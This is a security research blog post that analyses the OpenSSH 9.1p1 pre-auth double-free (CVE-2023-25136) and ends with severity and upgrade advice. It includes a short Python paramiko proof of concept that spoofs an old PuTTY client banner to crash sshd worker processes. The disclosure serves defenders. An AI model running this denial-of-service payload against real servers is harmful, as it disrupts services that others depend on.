https://jfrog.com/blog/openssh-pre-auth-double-free-cve-2023-25136-writeup-and-proof-of-concept/ [homepgae90x53] [360x53-Homepage-mobile-4] JFrog Logo JFrog Logo [ ] * Products * Solutions * Developers * Resources * Partners * Pricing * Become a JFrog Partner > * Find a JFrog Partner > * Get Help > * Community > * Documentation > Use Case * Artifact Management > Scalable binary lifecycle management * Software Supply Chain Security > Advanced security designed for DevOps * CI/CD > Advanced pipeline automation * Edge & IoT > Manage connected devices at scale, with the click of a button Industry * Financial Services > * Automotive Industry > * Healthcare Services > * Technology & Software > * Gaming > * Government > Diagram JFrog Enables Your DevOps Workflow Explore JFrog Integrations > JFrog Advanced Security Innovate Faster With Advanced DevOps Security For The Software Supply Chain LEARN MORE Learning & Guides * User Guides > * Knowledge Base > * JFrog Academy > * DevOps Consulting Services > * DevOps Certification > * Technical Webinars > * Workshops > * Artifact State of Union > * What are DevOps Tools? > Collateral * Resource Center > * JFrog Blog > Customer Zone * Support > Customer support, tickets and community * Manage & Troubleshoot > Renew, retrieve licenses, legal and more * MyJFrog > Cloud customer portal * Cloud Status > Service status & event subscription * JFrog Trust > How we protect you & your data The JFrog Platform End to End DevOps Platform to Power and Secure the Software Supply Chain Get Started [icon-artif] JFrog Artifactory Enterprise Universal Repository Manager Xray Logo JFrog Xray Advanced Security for DevOps: SCA, IaC, Secrets & Container Security JFrog Pipelines JFrog Pipelines Universal CI/CD DevOps Pipeline for the enterprise Distribution icon JFrog Distribution For Trusted Software Releases JFrog Container Registry JFrog Container Registry Powerful, Hybrid Docker and Helm Registry JFrog Connect JFrog Connect DevOps for Connected Devices [ ] Contact Us Start a Trial * Products + o The JFrog Platform End to End DevOps Platform to Power and Secure the Software Supply Chain + o JFrog Artifactory Enterprise Universal Repository Manager o JFrog Xray Advanced Security for DevOps: SCA, IaC, Secrets & Container Security o JFrog Pipelines Universal CI/CD DevOps Pipeline for the enterprise o JFrog Distribution For Trusted Software Releases o JFrog Container Registry Powerful, Hybrid Docker and Helm Registry o JFrog Connect DevOps for Connected Devices * Solutions + Use Case o Artifact Management Scalable binary lifecycle management o Software Supply Chain Security Advanced security designed for DevOps o CI/CD Advanced pipeline automation o Edge & IoT Manage connected devices at scale, with the click of a button + Industry o Financial Services o Automotive Industry o Healthcare Services o Technology & Software o Gaming o Government * Developers + o Community o Documentation * Resources + Learning & Guides o User Guides o Knowledge Base o JFrog Academy o DevOps Consulting Services o DevOps Certification o Technical Webinars o Workshops o Artifact State of Union o What are DevOps Tools? + Collateral o Resource Center o JFrog Blog + Customer Zone o Support Customer support, tickets and community o Manage & Troubleshoot Renew, retrieve licenses, legal and more o MyJFrog Cloud customer portal o Cloud Status Service status & event subscription o JFrog Trust How we protect you & your data * Partners + o Become a JFrog Partner o Find a JFrog Partner o Get Help * Pricing Blog Home OpenSSH Pre-Auth Double Free - CVE-2023-25136 - Writeup and Proof-of-Concept Yair Mizrahi By Yair Mizrahi, Senior Security Researcher February 8, 2023 8 min read SHARE: OpenSSH Pre-Auth Double Free CVE-2023-25136 Writeup and PoC OpenSSH's newly released version 9.2p1 contains a fix for a double-free vulnerability. Given the severe potential impact of the vulnerability on OpenSSH servers (DoS/RCE) and its high popularity in the industry, this security fix prompted the JFrog Security Research team to investigate the vulnerability. This blog post provides details on the vulnerability, who is affected, and a proof-of-concept to trigger it causing a Denial of Service (DoS). What is OpenSSH? OpenSSH is a popular tool used for secure communication and remote access. It was developed as a free, open-source implementation of the Secure Shell (SSH) communications protocol and is widely used for various applications. OpenSSH provides a secure and encrypted connection between two untrusted hosts over an insecure network, making it an essential tool for remote access and secure file transfer. With the increasing use of cloud computing and remote access to servers, OpenSSH has become a crucial tool for system administrators and developers who need to access and manage remote systems securely. OpenSSH also supports a wide range of platforms including Linux, macOS, and Windows, making it a widely adopted tool across different operating systems. With its ease of use and strong security features, OpenSSH has become an industry-standard tool for secure remote access. Vulnerability Background On February 2, 2023, OpenSSH released version 9.2p1 with this security advisory. It immediately became clear this version is of interest because of the pre-auth double-free vulnerability. Searching the OpenSSH's GitHub repository, this is the fix commit. The commit message indicates bz3522, which refers to the Bugzilla issue reported by the user Mantas Mikulenas. In its report, Mantas mentions using PuTTY obsolete version 0.64, also attaching a back-trace of the double-free abort. Research Walkthrough To dive deeper, we set up an environment with the vulnerable OpenSSH 9.1p1 and pulled a copy of the old PuTTY 0.64 version, released 8 years ago on February 28, 2015. The following error was returned after trying to connect with PuTTY 0.64 to the vulnerable OpenSSH server: PuTTY 0.64 Fatal Error Since the obsolete client's key exchange algorithms are not supported by the new OpenSSH version, we edited the sshd_config file by adding the following line to the /etc/ssh/sshd_config: KexAlgorithms +diffie-hellman-group1-sha1 After restarting the SSH server and trying again, the following error was returned: PuTTY Fatal Error After adding another configuration line to the sshd_config, we were able to connect to the vulnerable OpenSSH server and reproduce the crash: HostKeyAlgorithms +ssh-rsa Running the server in debug mode (using the -ddd flag), the following debug message was returned: ssh_sandbox_violation: unexpected system call (arch:0xc000003e,syscall:20 @ 0x7fd7473fb771) [preauth] The Syscall number 20 is writev() which matches the Bugzilla report. Note that the configuration changes we've made were only to reproduce the vulnerability through PuTTY and are not required to exploit it. As we'll see in the PoC, the default configuration is vulnerable. Vulnerability In-Depth Details We started by examining the fix commit stating that compat_kex_proposal() is responsible for the double-free. When the connection compatibility option SSH_OLD_DHGEX is true on [1], the second argument p is assigned to cp on [2] and later freed on [3]. /* Always returns pointer to allocated memory, caller must free. */ char * compat_kex_proposal(struct ssh *ssh, char *p) { char *cp = NULL; if ((ssh->compat & (SSH_BUG_CURVE25519PAD|SSH_OLD_DHGEX)) == 0) return xstrdup(p); debug2_f("original KEX proposal: %s", p); if ((ssh->compat & SSH_BUG_CURVE25519PAD) != 0) if ((p = match_filter_denylist(p, "curve25519-sha256@libssh.org")) == NULL) fatal("match_filter_denylist failed"); if ((ssh->compat & SSH_OLD_DHGEX) != 0) { [1] cp = p; [2] if ((p = match_filter_denylist(p, "diffie-hellman-group-exchange-sha256," "diffie-hellman-group-exchange-sha1")) == NULL) fatal("match_filter_denylist failed"); free(cp); [3] } debug2_f("compat KEX proposal: %s", p); if (*p == '\0') fatal("No supported key exchange algorithms found"); return p; } The call to compat_kex_proposal() is inside the do_ssh2_kex() function: myproposal[PROPOSAL_KEX_ALGS] = prop_kex = compat_kex_proposal(ssh, options.kex_algorithms); The freed cp=p from compat_kex_proposal() refers to the options.kex_algorithms argument. Searching for kex_algorithms in the source code, we encountered the assemble_algorithms from the crash in the Bugzilla report: ASSEMBLE(kex_algorithms, def_kex, all_kex); ASSEMBLE is a macro for calling the kex_assemble_names() function: #define ASSEMBLE(what, defaults, all) \ do { \ if ((r = kex_assemble_names(&o->what, defaults, all)) != 0) \ fatal_fr(r, "%s", #what); \ } while (0) The kex_assemble_names() function is called with the address of o-> kex_algorithms as its first argument (which is listp). This is where the second free occurs. int kex_assemble_names(char **listp, const char *def, const char *all) Due to the options.kex_algorithms handle being freed and becoming a dangling pointer, it's once again freed causing a double-free. But where is the SSH_OLD_DHGEX option set? Inside the compat_banner() function, which determines bug flags from the SSH protocol banner. A struct named check[] lists all the SSH client IDs and their flags. The following snippet shows the Client IDs that are assigned the SSH_OLD_DHGEX option. We can also see that WinSCP might also be able to trigger this behavior. { "PuTTY_Local:*," /* dev versions < Sep 2014 */ "PuTTY-Release-0.5*," /* 0.50-0.57, DH-GEX in >=0.52 */ "PuTTY_Release_0.5*," /* 0.58-0.59 */ "PuTTY_Release_0.60*," "PuTTY_Release_0.61*," "PuTTY_Release_0.62*," "PuTTY_Release_0.63*," "PuTTY_Release_0.64*", SSH_OLD_DHGEX }, { "FuTTY*", SSH_OLD_DHGEX }, /* Putty Fork */ { "WinSCP_release_4*," "WinSCP_release_5.0*," "WinSCP_release_5.1," "WinSCP_release_5.1.*," "WinSCP_release_5.5," "WinSCP_release_5.5.*," "WinSCP_release_5.6," "WinSCP_release_5.6.*," "WinSCP_release_5.7," "WinSCP_release_5.7.1," "WinSCP_release_5.7.2," "WinSCP_release_5.7.3," "WinSCP_release_5.7.4", SSH_OLD_DHGEX }, Proof-of-Concept We opted to create a Python Denial of service Proof-of-Concept because of its flexibility and portability. The proof-of-concept triggers the double-free using the paramiko package and causes an abort crash. paramiko is a widespread Python SSH implementation, providing both server and client functionality. For the PoC we changed the connecting client version banner to reflect an obsolete client like PuTTY v0.64. Available in our GitHub repository. import paramiko VICTIM_IP = "127.0.1" CLIENT_ID = "PuTTY_Release_0.64" def main(): transport = paramiko.Transport(VICTIM_IP) transport.local_version = f"SSH-2.0-{CLIENT_ID}" transport.connect(username='', password='') if __name__ == "__main__": main() Vulnerability Impact The OpenSSH Daemon listens for connections from clients. It forks a new daemon for each incoming connection. The forked daemons handle key exchange, encryption, authentication, command execution, and data exchange. The vulnerability is a double-free that can theoretically be exploited for a denial of service, as demonstrated by our Proof-of-Concept. Note that only the forked daemons crash, because of a sandbox violation while trying to call writev(), so it leaves the main server daemon free to handle new clients. OpenSSH has put security measures in place such as a sandbox and Privilege Separation mechanism. Though remote code execution is theoretically possible, it would require deep-dive research for finding allocation primitives, and even then- will be less impactful because of its security measures. The JFrog Security Research team gave this vulnerability a Medium severity rating for the following reasons: * No prerequisites are required. A default configuration is vulnerable. * A DoS attack that crashes a forked worker process is much less severe than a DoS that crashes an important daemon, but they will both receive a "High" Availability impact CVSS rating. * OpenSSH has put security measures in place such as a sandbox and Privilege Separation mechanism. Vulnerability Targets The vulnerability applies only to OpenSSH version 9.1p1 with a default configuration, meaning no prerequisites are required. Remediation It's strongly recommended to upgrade OpenSSH to the latest version 9.2p1. However, it should be noted again that this vulnerability requires high complexity to leverage for remote code execution due to OpenSSH's security measures (e.g. sandboxing). Is the JFrog Platform Vulnerable to the Vulnerability? After conducting internal research, we can confirm that the JFrog DevOps platform is not vulnerable to OpenSSH's CVE-2023-25136. Stay up-to-date with JFrog Security Research The security research team's findings and research play an important role in improving the JFrog Platform's application software security capabilities. This manifests in the form of enhanced CVE metadata and remediation advice for developers, DevOps and security teams in the JFrog Xray vulnerability database. And also as new security scanning capabilities used by JFrog Xray. Follow the latest discoveries and technical updates from the JFrog Security Research team in our research website, security research blog posts and on Twitter at @JFrogSecurity. Tags: proof-of-concept double-free openssh security-research Learn More SHARE: Sign up for blog updates [ ] [ ] I have read and agreed to the Privacy Policy Subscribe Popular Tags * CI/CD * Artifactory * Best Practices * DevOps * Xray Try the JFrog Platform In the cloud or self-hosted Start a Trial or Book a Demo Thank You! Full Name* [ ] Email* [ ] [ ] I have read and agree to the Privacy Policy Proceed Products * Artifactory * Xray * Pipelines * Distribution * Container Registry * Connect * JFrog Platform * Start Free Resources * Blog * Events * Integrations * User Guide * DevOps Tools * Open Source * Featured * JFrog Trust * Compare JFrog Company * About * Management * Investor Relations * Partners * Customers * Careers * Press * Contact Us * Brand Guidelines Developer * Community * Downloads * Community Events * Open Source Foundations * Community Forum * Superfrogs Follow Us (c) 2023 JFrog Ltd All Rights Reserved JFrog Logo Terms of Use | Privacy Policy | Cookies Policy | Cookies Settings | Accessibility Mode Success Your action was successful Get Started x Oops... Something went wrong Please try again later Continue close Information frog hand Modal Message Continue